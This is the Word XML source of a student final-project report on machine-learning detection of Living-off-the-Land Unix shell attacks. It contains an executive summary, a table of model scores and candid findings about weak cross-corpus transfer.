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960" w:after="240" w:lineRule="auto" w:line="312"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>LotL Shell Attack Detection</w:t>
        <w:br/>
        <w:t>Binary Classifier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:lineRule="auto" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK T1059.004 | Course 3917</w:t>
        <w:br/>
        <w:t>Reichman University — Final Project</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="480" w:after="0" w:lineRule="auto" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Group 10  |  Ben Volovelsky &amp; Noam Delbari  |  August 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:br w:type="page"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Problem.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Living-off-the-Land attacks (MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>T1059.004</w:t>
      </w:r>
      <w:r>
        <w:t>, Unix Shell)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">execute entirely through binaries the operating system already ships — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>base64</w:t>
      </w:r>
      <w:r>
        <w:t>. Nothing malicious is written to disk, so signature</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>and file-reputation controls have nothing to inspect; the only surviving</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>telemetry is the command line itself. This project asks whether a shell command</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>string, in isolation, carries enough signal to separate an attacker's use of a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>system binary from an administrator's.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Data and method.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> We built two corpora with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>provenance-based labelling</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>a command's label comes from where it was collected, never from a keyword rule,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">so the labels cannot encode the answer. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Dataset 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (15,248 commands) is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>curated: offensive material from HackTricks, GTFOBins and Atomic Red Team</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">against documentation and tutorial corpora. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Dataset 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (9,576 commands) is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>operational: a Cowrie honeypot against real user shell history. Both are 25%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">malicious, so a detector that flags everything scores </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>F1 = 0.400</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>do-nothing floor every result below is measured against. Train/test splits are</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>grouped by command shape</w:t>
      </w:r>
      <w:r>
        <w:t>, not random, so no near-duplicate straddles the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>split; this is stricter than the ungrouped cross-validation the comparable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>literature uses and it costs us several F1 points. We engineered **43</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>behavioural features**, selected from 68 candidates by a documented audit, and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>trained five detectors plus a character n-gram baseline.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model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>D1 F1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>D2 F1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>D1 FPR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>D2→D1 transfer F1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>char n-gram baseline (TF-IDF + LR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8808</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8631</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0385</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.2740</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>XGBoost-hybrid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8761</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8482</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0415</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.2756</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1D-CNN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8603</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8384</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0555</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.3587</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Random Forest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7963</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7531</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0337</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.1432</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>XGBoost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7856</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7557</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0717</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.2349</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Isolation Forest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.2492</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.1431</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0079</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.2407</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Findings.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> In-domain detection works: the best engineered model reaches F1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>0.876 at a 4.2% false-alarm rate. Three results matter more than that headline,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>and the report leads with all three rather than qualifying them at the end.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>First, **the untuned character n-gram baseline beats all five</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>engineered-feature models on both corpora**, and beats the strongest of them on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>false alarms as well (3.9% against the hybrid's 4.2%). Forty-three</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>hand-designed, threat-mapped features do not out-perform a bag of character</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>n-grams — which independently confirms the central representational claim of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the ShellCore paper we benchmark against.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Second, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cross-corpus transfer collapses below the do-nothing floor</w:t>
      </w:r>
      <w:r>
        <w:t>: trained</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>on operational traffic and tested on curated attacks, all six models score</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>between 0.14 and 0.36 against a floor of 0.400. Models this accurate in-domain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>are learning corpus style, not attacker behaviour. Third, **the recommended</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>three-stage cascade is beaten by a single decision threshold** on the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>supervised model it contains, so we recommend against deploying it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Contribution.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The project's value is not a state-of-the-art number. It is a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>measured decomposition of the 20-point gap to published work into two halves —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>≈10 points representation, ≈10 points corpus-and-protocol; an error forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>showing that 100% of the Random Forest's missed attacks sit at the benign end of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>every high-signal feature; and a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">quantified ceiling — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>+3.7 F1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — for the LLM arbitration layer, on the 5% of</w:t>
      </w:r>
